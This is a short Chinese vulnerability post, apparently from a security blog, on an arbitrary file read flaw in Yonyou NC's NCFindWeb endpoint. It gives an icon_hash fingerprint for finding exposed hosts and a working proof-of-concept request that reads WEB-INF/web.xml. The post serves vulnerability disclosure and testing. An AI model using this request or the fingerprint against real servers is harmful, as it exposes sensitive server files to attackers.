Yonyou NC NCFindWeb 任意文件读取漏洞

# Yonyou NC NCFindWeb 任意文件读取漏洞 ## 漏洞描述 YonyouNC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件 ## 漏洞影响 YonyouNC ## 网络测绘 icon_hash=&qu...

Yonyou NC NCFindWeb 任意文件读取漏洞

漏洞描述

YonyouNC存在任意文件读取漏洞,攻击者通过漏洞可读取服务器敏感文件

漏洞影响

YonyouNC

网络测绘

icon_hash="1085941792"

漏洞复现

登陆页面

img

验证POC

 /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml

img

  • 发表于 2024-07-12 18:45:01
  • 阅读 ( 2340 )
  • 分类:OA产品

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

带头大哥

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计